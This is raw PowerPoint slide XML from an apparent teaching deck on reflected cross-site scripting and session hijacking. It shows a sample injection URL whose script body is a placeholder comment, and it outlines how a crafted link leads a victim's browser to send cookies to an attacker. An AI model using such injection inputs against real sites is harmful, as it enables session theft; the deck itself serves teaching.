            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Reflected XSS attacks, also known as non-persistent attacks, occur when a malicious script is reflected off of a web application to the victim’s browser.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Reflected cross-site scripting (or XSS) arises when an application receives data in an HTTP request and includes that data within the immediate response in an unsafe way.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Here, the malicious string is part of the victim's request to the website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>The website then includes this malicious string in the response sent back to the user.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3259543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1FE9-0943-455F-AEDC-25E7359A5D20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reflected Cross Site Scripting</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{870E458A-B724-462F-A52D-84DD71C53BDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333332"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Suppose a website has a search function which receives the user-supplied search term in a URL parameter:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333332"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://insecure-website.com/search?term=gift</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333332"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333332"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The application echoes the supplied search term in the response to this URL:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333332"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;p&gt;You searched for: gift&lt;/p&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333332"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333332"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Assuming the application doesn't perform any other processing of the data, an attacker can construct an attack like this:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333332"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://insecure-website.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333332"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>status?message</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333332"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>=&lt;script&gt;/*+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333332"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Bad+stuff+here</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333332"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>...+*/&lt;/script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333332"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3962209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76DE-2F15-4EF6-B705-45820312B986}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reflected Cross Site Scripting</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A2C81C2-80EC-4029-BE13-2F1311A3E175}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333332"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>This URL results in the following response:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333332"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;p&gt;You searched for: &lt;script&gt;/* Bad stuff here... */&lt;/script&gt;&lt;/p&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333332"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>If another user of the application requests the attacker's URL, then the script supplied by the attacker will execute in the victim user's browser, in the context of their session with the application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333332"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Let us understand through another example:</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1700500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0C6-B565-4541-888E-295C16FAA42E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reflected Cross Site Scripting</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4A36558-1FEA-4010-A34D-A1859011B356}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="3455504" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>1) The attacker crafts a URL containing a malicious string and sends it to the victim</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>The attacker can send the malicious URL to the victim (using e-mail or instant messaging, for example) and trick him into visiting it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>The attacker can publish a link to the malicious URL (on his own website or on a social network, for example) and wait for visitors to click it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>2) The victim is tricked by the attacker into requesting the URL from the website.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{582B688A-17E7-4F46-9E4D-C02930566040}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="521387"/>
            <a:ext cx="12376095" cy="6129670"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="492188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0C6-B565-4541-888E-295C16FAA42E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reflected Cross Site Scripting</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4A36558-1FEA-4010-A34D-A1859011B356}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="3455504" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>3) The website includes the malicious string from the URL in the response.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>4) The victim's browser executes the malicious script inside the response, sending the victim's cookies to the attacker's server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{582B688A-17E7-4F46-9E4D-C02930566040}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4465982" y="2022032"/>
            <a:ext cx="7573617" cy="3751084"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="115490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1D6A-997A-4075-8644-02F7D08C8079}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Session Hijacking types in OSI Level</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF79577F-5B63-4AD6-B71E-8634068EB307}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect b="56605"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1201489" y="1690687"/>
            <a:ext cx="9082197" cy="2165695"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F838EF4-B952-4DE6-BFBE-6CA5498811B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3286539" y="2809461"/>
            <a:ext cx="622852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BC336C-507A-429C-B4B2-C3AA26CFD04B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1437861" y="3054626"/>
            <a:ext cx="80772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DBDDC7-8F55-44EA-B0CC-237144EDA08C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1437861" y="3299792"/>
            <a:ext cx="225949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0A44F99-E5AF-4563-B763-36DDF2C7ECDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1437861" y="3856382"/>
            <a:ext cx="465813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82498A2-F269-4372-A19D-CFBE28C7093A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6626087" y="3584714"/>
            <a:ext cx="27962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3A84978-8DFC-4021-8F52-1E1CD4D92036}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1201489" y="4343157"/>
            <a:ext cx="9546024" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>For TCP and UDP, the sessions are the periods of time where the client is connected and actively passing information to the server. At the beginning of the session, the user/client is authenticated and then it is assumed that as long as the ACK numbers on the packets are correct, the server is talking to the same user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The TCP and UDP sessions are hijacked by taking control of the packets that are sent between client and server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="286868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1D6A-997A-4075-8644-02F7D08C8079}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="365125"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Session Hijacking types in OSI Level</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF79577F-5B63-4AD6-B71E-8634068EB307}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="42333"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1307506" y="1690688"/>
            <a:ext cx="9082197" cy="2877970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="Straight Connector 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B5081E4-C48D-43AA-91A1-1353CFE457BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1543878" y="2081626"/>
            <a:ext cx="798443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5D7EDAD-6153-4ECD-AED9-4E1AD84366C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1543878" y="2300287"/>
            <a:ext cx="798443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944D3D-F556-4B10-A1DE-1B0446D26EFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1543878" y="2598461"/>
            <a:ext cx="477740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51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A3F6-1DBB-45F4-8D73-242A0E1E38C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Application Level Hijacking</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4F88052-3814-4105-9724-780B003B1BE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1924879" y="1793424"/>
            <a:ext cx="9087678" cy="4967525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="696972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E268-7C6A-4FD2-8062-40350DB2236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1F03EE19-89CA-4523-AFCB-EDED32B76F3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="365125"/>
            <a:ext cx="9856304" cy="6008856"/>
